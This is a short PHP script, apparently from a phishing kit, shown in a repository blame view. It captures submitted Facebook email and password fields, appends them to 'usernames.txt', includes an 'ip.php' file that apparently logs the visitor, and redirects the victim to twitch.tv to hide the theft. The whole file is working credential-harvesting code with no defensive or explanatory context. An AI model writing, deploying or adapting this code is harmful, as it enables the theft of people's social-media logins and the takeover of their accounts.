8 lines
223 B
PHP
Raw Normal View History

<?php
include 'base.php';
2018-06-07 14:23:56 +05:00
include 'ip.php';
2018-04-28 08:29:36 +05:30
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $_POST['fb_email'] . " [FB-PASS]: " . $_POST['fb_pass'] . "\n", FILE_APPEND);
header('Location: https://twitch.tv/');
exit();